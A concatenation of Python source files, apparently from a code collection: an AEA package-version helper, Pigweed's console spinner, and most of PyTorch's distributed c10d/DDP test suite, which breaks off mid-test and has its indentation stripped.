"""
Remove package versions.
This method is called whenever a project agent is removed.
It updates an internal data structure that it is used to
check inconsistencies of AEA package versions across projects.
In particular, all the AEA packages with the same "prefix" must
be of the same version.
:param agent_config: the agent configuration.
"""
package_prefix_to_remove = set()
for (
package_prefix,
(_version, agents),
) in self._package_id_prefix_to_version.items():
if agent_config.public_id in agents:
agents.remove(agent_config.public_id)
if len(agents) == 0:
package_prefix_to_remove.add(package_prefix)
for package_prefix in package_prefix_to_remove:
self._package_id_prefix_to_version.pop(package_prefix)
|
spinner.py
|
# Copyright 2020 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Spinner!"""
import contextlib
import sys
import threading
import time
class Spinner(object): # pylint: disable=useless-object-inheritance
"""Spinner!"""
def __init__(self, *args, **kwargs):
super(Spinner, self).__init__(*args, **kwargs)
self._done = None
self._thread = None
def __del__(self):
self._done = True
def _spin(self):
i = 0
chars = '|/-\\'
while not self._done:
sys.stdout.write('[{}]'.format(chars[i]))
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\b\b\b')
i = (i + 1) % len(chars)
def start(self):
self._done = False
self._thread = threading.Thread(target=self._spin)
self._thread.start()
def stop(self):
assert self._thread
self._done = True
self._thread.join()
self._thread = None
@contextlib.contextmanager
def __call__(self):
try:
self.start()
yield self
finally:
self.stop()
|
test_c10d_common.py
|
# Owner(s): ["oncall: distributed"]
import copy
import os
import sys
import tempfile
import threading
import time
from datetime import timedelta
from itertools import product
from sys import platform
from contextlib import suppress
import torch
import torch.distributed as dist
if not dist.is_available():
print("distributed package not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed.distributed_c10d as c10d
from torch.utils.checkpoint import checkpoint
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
skip_if_lt_x_gpu,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
TEST_WITH_DEV_DBG_ASAN,
instantiate_parametrized_tests,
parametrize
)
if TEST_WITH_DEV_DBG_ASAN:
print("Multiprocessing spawn is not compatible with dev/dbg asan", file=sys.stderr)
sys.exit(0)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
torch.backends.cuda.matmul.allow_tf32 = False
def gpus_for_rank(world_size):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
class AbstractTimeoutTest(object):
def _test_store_timeout(self, backend, init_method, c2p):
try:
dist.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
dist.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
# Could say
# x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
# etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
# is to verify weights are where expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
class CommonDistributedDataParallelTest(object):
def tearDown(self):
# DistributedDataParallel test doesn't seem to call FileStore destructor
# TODO: investigate this test and the test is known to have issues
# Use this hack to remove files for that test
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _get_store(self):
return dist.FileStore(self.file_name, self.world_size)
def _get_process_group(self):
raise NotImplementedError("To be implemented by child class")
def _train_model(self, model, input_var, target, loss, run_checkpoint=False, use_reentrant=True):
model.train()
if run_checkpoint:
output = checkpoint(model, input_var, use_reentrant=use_reentrant)
else:
output = model(input_var)
l = loss(output, target)
l.backward()
def _test_ddp_checkpointing(
self,
input_model,
process_group,
use_bucket_view,
find_unused_parameters=False,
static_graph=False,
run_checkpoint=False,
use_reentrant=True,
allow_none_grads=False,
):
# to reproduce the same training results
torch.cuda.set_device(self.rank)
torch.manual_seed(31415)
model = copy.deepcopy(input_model).cuda()
ddp_model = copy.deepcopy(input_model).cuda()
ddp_model = nn.parallel.DistributedDataParallel(
ddp_model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
static_graph=static_graph,
)
self.assertEqual(
ddp_model._get_ddp_logging_data().get("static_graph", 0), static_graph
)
input, ddp_input, target, ddp_target = self._prepare_dummy_data()
loss = nn.MSELoss()
n_iters = 5
for i in range(n_iters):
model.zero_grad(set_to_none=False)
ddp_model.zero_grad(set_to_none=False)
self._train_model(model, input, target, loss, run_checkpoint=run_checkpoint, use_reentrant=use_reentrant)
self._train_model(
ddp_model, ddp_input, ddp_target, loss, run_checkpoint=run_checkpoint, use_reentrant=use_reentrant
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
if not allow_none_grads:
self.assertTrue(i.grad is not None)
self.assertTrue(j.grad is not None)
self.assertEqual(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# A list of tests for ddp with activation checkpointing
# when gradient_as_bucket_view=True, False.
# Most of the tests are referred to
# https://github.com/facebookresearch/fairscale/blob/main/tests/nn/pipe/test_checkpoint_ddp.py
class CheckpointOnceModule(nn.Module):
"""
Runs checkpoint for a single layer in the model.
"""
def __init__(self, use_reentrant=True):
super().__init__()
self.l1 = nn.Linear(20, 20)
self.l2 = nn.Linear(20, 20)
self.use_reentrant = use_reentrant
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x, use_reentrant=self.use_reentrant)
return x
class CheckpointTwiceModule(CheckpointOnceModule):
"""
Runs checkpoint for the same layer twice in a model. This simulates use
cases such as pipeline parallel where the same layer can be checkpointed
more than one time.
"""
def __init__(self, use_reentrant=True):
super().__init__(use_reentrant=use_reentrant)
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x, use_reentrant=self.use_reentrant)
x = checkpoint(self.l2, x, use_reentrant=self.use_reentrant)
return x
class CheckpointTwiceModuleWeightSharing(CheckpointTwiceModule):
"""
Similar to CheckpointTwiceModule but the weights are shared.
"""
def __init__(self, use_reentrant=True):
super().__init__(use_reentrant=use_reentrant)
# Share weights
self.l1.weight = self.l2.weight
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x, use_reentrant=self.use_reentrant)
x = checkpoint(self.l2, x, use_reentrant=self.use_reentrant)
return x
class DynamicCheckpointTwiceModule(CheckpointTwiceModule):
def __init__(self, use_reentrant=True):
super().__init__(use_reentrant=use_reentrant)
self.count = 0
def forward(self, inp):
if self.count % 2:
x = checkpoint(self.l1, inp, use_reentrant=self.use_reentrant)
else:
x = checkpoint(self.l2, inp, use_reentrant=self.use_reentrant)
self.count += 1
return x
class DynamicCheckpointTwiceModuleWeightSharing(DynamicCheckpointTwiceModule):
def __init__(self, use_reentrant=True):
super().__init__(use_reentrant=use_reentrant)
# Share weights
self.l1.weight = self.l2.weight
def _prepare_dummy_data(self):
ddp_bs = 16
bs = ddp_bs * self.world_size
input = torch.rand((bs, 20), device="cuda", requires_grad=True)
target = torch.randn((bs, 20), device="cuda")
offset = self.rank * ddp_bs
ddp_input = input[offset : offset + ddp_bs]
ddp_target = target[offset : offset + ddp_bs]
return input, ddp_input, target, ddp_target
@skip_if_lt_x_gpu(2)
@parametrize("use_reentrant", [True, False])
def test_ddp_checkpointing_once(self, use_reentrant):
"""
DDP works as expected when layer is checkpointed only once.
"""
process_group = self._get_process_group()
for use_bucket_view, static_graph in product((False, True), (False, True)):
self._test_ddp_checkpointing(
self.CheckpointOnceModule(use_reentrant=use_reentrant),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
)
if static_graph:
# find_unused_parameters does not make a difference, since it is
# ignored for static graph.
self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
find_unused_parameters=True,
)
@skip_if_lt_x_gpu(2)
@parametrize("use_reentrant", [True, False])
def test_ddp_checkpointing_unused_params(self, use_reentrant):
"""
With reentrant autograd checkpointing impl, DDP will fail when there are
unused params in the model and no static graph training. With
non-reentrant checkpointing implementation, this works as expected.
"""
process_group = self._get_process_group()
for use_bucket_view in (True, False):
err_ctx = (
suppress() if not use_reentrant else
self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once."
)
)
with err_ctx:
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(use_reentrant=use_reentrant),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
)
# test passes when static_graph is true
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(use_reentrant=use_reentrant),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=True,
)
@skip_if_lt_x_gpu(2)
@parametrize("use_reentrant", [True, False])
def test_ddp_checkpointing_twice(self, use_reentrant):
"""
Checkpoitning twice fails for non-static graph with reentrant checkpoint
implementation, succeeds with non-reentrant checkpoint implementation.
"""
process_group = self._get_process_group()
for use_bucket_view in (True, False):
err_ctx = (
suppress() if not use_reentrant else
self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once."
)
)
with err_ctx:
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(use_reentrant=use_reentrant),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
)
with err_ctx:
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(use_reentrant=use_reentrant),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
find_unused_parameters=True,
)
@skip_if_lt_x_gpu(2)
@parametrize("use_reentrant", [True, False])
def test_ddp_checkpointing_twice_static_graph(self, use_reentrant):
"""
Regardless of reentrant or non-reentrant checkpointing impl,
checkpointing twice works with static graph enabled.
"""
process_group = self._get_process_group()
for use_bucket_view in (True, False):
# Test passes when static_graph=True.
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(use_reentrant=use_reentrant),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=True,
)
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_dynamic_module(self):
"""
Dynamic module can be checkpointed, multiple times, with non-reentrant
checkpointing implementation.
"""
process_group = self._get_process_group()
for use_bucket_view in (True, False):
model = self._test_ddp_checkpointing(
self.DynamicCheckpointTwiceModule(use_reentrant=False),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
find_unused_parameters=True,
# Grads can be none sometimes due to dynamic module not using
# all params.
allow_none_grads=True
)
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_dynamic_weight_sharing(self):
"""
Dynamic module can be checkpointed multiple times with weight sharing
using non-reentrant checkpointing implementation.
"""
process_group = self._get_process_group()
for use_bucket_view in (True, False):
model = self._test_ddp_checkpointing(
self.DynamicCheckpointTwiceModuleWeightSharing(use_reentrant=False),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
find_unused_parameters=True,
# Grads can be none sometimes due to dynamic module not using
# all params.
allow_none_grads=True
)
# DDP works as expected if there is weight sharing among layers
@skip_if_lt_x_gpu(2)
@parametrize("use_reentrant", [True, False])
def test_ddp_checkpointing_weight_sharing(self, use_reentrant):
"""
Test that checkpointing with weight sharing works.
"""
process_group = self._get_process_group()
torch.cuda.set_device(self.rank)
for use_bucket_view, static_graph in product((False, True), (False, True)):
torch.manual_seed(31415)
l1 = nn.Linear(20, 20)
l2 = nn.Linear(20, 20)
l1.weight = l2.weight
model = nn.Sequential(l1, l2)
# TODO: non-reentrant based checkpointing of DDP module with
# static_graph runs into the below issue, see
# https://github.com/pytorch/pytorch/issues/70865 and
# https://github.com/pytorch/pytorch/issues/58111 for details.
err_ctx = (
self.assertRaisesRegex(
RuntimeError,
"Your training graph has changed in this iteration"
) if static_graph and not use_reentrant else suppress()
)
with err_ctx:
self._test_ddp_checkpointing(
model,
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
run_checkpoint=True,
use_reentrant=use_reentrant,
)
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_twice_weight_sharing(self):
"""
Checkpointing should work with static graph in the case of checkpointing
same layer twice and having weights shared acrosss layers.
"""
process_group = self._get_process_group()
torch.cuda.set_device(self.rank)
for use_bucket_view in (True, False):
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModuleWeightSharing(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=True,
)
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
integers, a list of `torch.Device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
must always be specified as list of `torch.Device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertTrue(ddp_logging_data.get("is_multi_device_module"))
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertFalse(ddp_logging_data.get("is_multi_device_module"))
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
# DDP training, DDP scatters subsets of input_cpu to nodes/GPUs
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
[self.assertEqual(p.grad, expected_grad) for p in model.parameters()]
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
fut = torch.futures.Future()
fut.set_result(torch.ones_like(bucket.buffer()))
def fut_then(fut):
# Add ones to fut's result.
t = fut.value()
return t + torch.ones_like(t)
return fut.then(fut_then)
class ComputeBucketAssignmentTest(TestCase):
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [40, 80]
)
self.assertEqual(per_bucket_size_limits, [40, 80, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [200, 400]
)
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
self.assertEqual(per_bucket_size_limits, [200, 200, 400, 400])
class AbstractCommTest(object):
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _verify_sequence_number_across_pg(self, pg, verify_pg):
seq_num = pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
# We use a separate pg to verify the sequence numbers, otherwise these
# collectives will themselves increment the sequence number.
dist.all_gather_object(obj_list, seq_num, group=verify_pg)
self.assertEqual(len(set(obj_list)), 1)
return obj_list[0]
def _test_sequence_num_incremented(self, process_group, ranks):
# verify initial sequence numbers. Use a distinct process group for
# verification to keep counts as expected with respect to process_group.
verify_pg = dist.new_group(
ranks=ranks,
backend="gloo",
)
assert dist.get_world_size(process_group) == dist.get_world_size(verify_pg)
initial_num = (
self._verify_sequence_number_across_pg(
pg=process_group, verify_pg=verify_pg
)
if not c10d._rank_not_in_group(process_group)
else -1
)
# Verify sequence numbers are appropriately incremented
for i in range(10):
t = torch.ones(1, device=torch.cuda.current_device())
dist.all_reduce(t, group=process_group)
if not c10d._rank_not_in_group(process_group):
seq_num = self._verify_sequence_number_across_pg(
pg=process_group,
verify_pg=verify_pg,
)
self.assertEqual(initial_num + i + 1, seq_num)
if dist.get_world_size(process_group) > 2:
# Test when certain ranks don't call collectives
if dist.get_rank(process_group) not in [0, 2]:
dist.all_reduce(t, group=process_group, async_op=True)
# Now ranks 0 and 2 should be lagging by 1.
if not c10d._rank_not_in_group(process_group):
seq_num = process_group._get_sequence_number_for_group()
rank = dist.get_rank(process_group)
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
dist.all_gather_object(obj_list, (rank, seq_num), group=verify_pg)
rank_to_seq_num = {rank: num for (rank, num) in obj_list}
self.assertEqual(len(set(rank_to_seq_num.values())), 2)
self.assertEqual(rank_to_seq_num[0], rank_to_seq_num[2])
expected_same = {
rank_to_seq_num[i]
for i in rank_to_seq_num.keys()
if i not in [0, 2]
}
self.assertEqual(len(expected_same), 1)
self.assertEqual(rank_to_seq_num[0] + 1, rank_to_seq_num[1])
def _test_sequence_num_incremented_default_group(self, backend_name):
torch.cuda.set_device(self.rank)
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
self._test_sequence_num_incremented(
c10d._get_default_group(),
ranks=list(i for i in range(dist.get_world_size())),
)
def _test_sequence_num_incremented_subgroup(self, backend_name):
torch.cuda.set_device(self.rank)
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup_ranks = [0, 1, 2]
subgroup = dist.new_group(subgroup_ranks)
self._test_sequence_num_incremented(subgroup, subgroup_ranks)
def _test_sequence_num_set_default_pg(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
default_pg = c10d._get_default_group()
seq_num = default_pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size())]
dist.all_gather_object(obj_list, seq_num)
self.assertEqual(len(set(obj_list)), 1)
def _test_sequence_num_set_new_group(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup = dist.new_group([0, 1])
if not c10d._rank_not_in_group(subgroup):
subgroup_seq = subgroup._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(subgroup))]
dist.all_gather_object(obj_list, subgroup_seq, group=subgroup)
self.assertEqual(len(set(obj_list)), 1)
def _test_warn_not_in_group(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
in_group_ranks = list(filter(lambda x: x % 2 == 0, range(self.world_size)))
group = dist.new_group(in_group_ranks)
x = torch.zeros(2, 2).cuda(self.rank)
xs = [torch.zeros(2, 2).cuda(self.rank) for _ in range(len(in_group_ranks))]
if self.rank not in in_group_ranks:
msg = ".*{}.*does not belong to.*"
with self.assertWarnsOnceRegex(UserWarning, msg.format("all_gather")):
dist.all_gather(xs, x, group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("all_reduce")):
dist.all_reduce(x, group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("barrier")):
dist.barrier(group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("broadcast")):
dist.broadcast(x, src=0, group=group)
else:
dist.all_gather(xs, x, group=group)
dist.all_reduce(x, group=group)
dist.barrier(group=group)
dist.broadcast(x, src=0, group=group)
class CommTest(AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_debug_level(self):
try:
del os.environ["TORCH_DISTRIBUTED_DEBUG"]
except KeyError:
pass
dist.set_debug_level_from_env()
# Default should be off
default_debug_mode = dist.get_debug_level()
self.assertEqual(default_debug_mode, dist.DebugLevel.OFF)
mapping = {
"OFF": dist.DebugLevel.OFF,
"off": dist.DebugLevel.OFF,
"oFf": dist.DebugLevel.OFF,
"INFO": dist.DebugLevel.INFO,
"info": dist.DebugLevel.INFO,
"INfO": dist.DebugLevel.INFO,
"DETAIL": dist.DebugLevel.DETAIL,
"detail": dist.DebugLevel.DETAIL,
"DeTaIl": dist.DebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
dist.set_debug_level_from_env()
set_debug_mode = dist.get_debug_level()
self.assertEqual(
set_debug_mode,
mapping[mode],
